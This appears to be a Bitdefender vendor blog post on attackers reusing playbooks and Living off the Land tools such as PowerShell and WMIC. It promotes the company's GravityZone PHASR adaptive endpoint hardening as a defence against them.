Breaking the cycle of attack playbook reuse

Threat actors have learned an old business trick: find what works, and repeat it. Across countless cyberattacks, Bitdefender has observed adversaries consistently applying the same steps—the same techniques, the same security bypass patterns—across different targets. What’s effective in one environment is often just as effective in another, and attackers know it.

This isn’t a coincidence. Once an attacker figures out how to evade a specific endpoint protection solution, they replicate the environment in a lab and refine the approach until it’s stealthy enough to deploy with confidence. When the attack is successful, it becomes a reusable asset. The pattern continues from organization to organization, exploiting systems that share similar security configurations or the same blind spots.

The consistency across enterprise environments is part of the problem. Most organizations rely on uniform policies—one-size-fits-all configurations deployed across all users and endpoints. While this simplifies management, it also creates predictable defenses that adversaries can test against in advance.

And central to these repeatable attacks are Living off the Land (LOTL) techniques. LOTL relies on native tools—already present on endpoints—to carry out attacks without triggering alarms. From PowerShell and WMIC to Netsh and Bitsadmin, these are utilities trusted by administrators, but regularly hijacked by attackers.

In our analysis of over 700,000 incidents, 84% of major attacks involved the use of LOTL binaries. These aren’t theoretical threats—they are what threat actors are actively using in real-world campaigns. And many of the tools they exploit are enabled by default, or rarely monitored because they’re assumed to be legitimate.

WMIC, for example, is supposed to be obsolete—yet we still see it regularly used, not only by legacy scripts, but by third-party applications that invoke it in the background. PowerShell activity appeared on 73% of all endpoints we analyzed, including systems where administrators weren’t the primary users. This ambiguity—tools being used both legitimately and maliciously—makes detection difficult and prevention even harder.

So how do defenders break this cycle?

A meaningful response requires more than detection. It requires unpredictability. If security behaves the same way everywhere, attackers can learn once and apply it many times. But if every system responds differently—if hardening adapts to each user-device pair, to the actual behavior, and what’s happening in the environment—then even the best playbook fails the moment it encounters variability.

That principle led to the creation of Bitdefender GravityZone PHASR. The goal was not just to block known threats, but to make the attack surface a moving target. PHASR tailors security to each user and endpoint by observing normal behavior, identifying what’s unnecessary or risky, and automatically applying restrictions. The result is individualized hardening that evolves with the environment.

For instance, instead of blocking PowerShell entirely—which would break legitimate operations—PHASR allows standard scripts while blocking the atypical or encrypted commands attackers rely on. The same applies to WMIC or Netsh. Rather than shutting off tools and disrupting workflows, PHASR filters actions based on risk, making decisions based on what’s actually happening, not just what’s allowed in policy.

What this means in practice is simple: even if attackers build the perfect bypass for one system, that method won’t work on the next. PHASR eliminates the predictability attackers rely on. And because it continuously learns from endpoint behavior, it doesn’t need constant manual updates or tuning to stay ahead.

Breaking the cycle of playbook reuse doesn’t require guesswork. It requires systems that stop being uniform and start being adaptive. By moving from static configurations to individualized, behavior-based hardening, organizations gain the ability to stop threats before they start—even if the attacker has used the same steps dozens of times before.

In cybersecurity, attackers look for the path of least resistance. With tailored, proactive defenses, we can make sure that path no longer leads to us.